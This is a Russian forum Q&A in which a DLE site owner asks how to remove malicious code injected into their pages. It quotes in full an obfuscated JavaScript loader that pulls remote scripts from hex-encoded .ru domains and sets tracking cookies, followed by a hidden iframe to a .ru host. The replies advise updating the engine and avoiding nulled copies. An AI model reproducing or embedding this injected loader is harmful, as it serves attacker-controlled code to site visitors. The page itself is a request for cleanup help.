Не нравятся результаты поиска? Попробуйте другой поиск!

Как удалить вирус в исходном html коде?


     23.12.2015    Общие вопросы    1033

вопрос
Добрый день. Подскажите пожалуйста, при добавлении новости на сайт в исходном html коде появилась такая гадость:
<script>
//<![CDATA[
window.a1336404323 = 1;!function(){var e=JSON.parse('["666d7a78753570743278376a2e7275","38376a6f6f6a696e3366622e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kinoobed.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
//]]>
</script>
<iframe id="a1996667054" src="//fmzxu5pt2x7j.ru/f.html" style="display: none;"></iframe>


в каком файле искать и как правильно удалить вирус. Спасибо.

Ответил: ПафНутиЙ


1. Не использовать null dle
2. Не использовать слитые шаблоны, рипы и т.п.
И проблемы не будет в принципе.

Комментарии пользователей (4)

wadim112
5

wadim112 - 24 декабря 2015 00:48 - Юзер

Сайту 3 года. Лицензия от dle. Появился вирус день назад. Шаблон чистился изначально полностью. Решение проблемы существует? Подскажите пожалуйста.

Westus
4

189 | 28

Westus - 24 декабря 2015 01:00 - Юзер

Обновить движок.

anfalin
2

62 | 5

anfalin - 24 декабря 2015 16:30 - Юзер

Могу найти вирус, но если есть где то "дыра" в движке или модулях то не факт что снова не появится

wadim112
5

wadim112 - 24 декабря 2015 19:20 - Юзер

Обновил движок, заменил addnews.php, гадость исчезла, не знаю надолго ли.

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы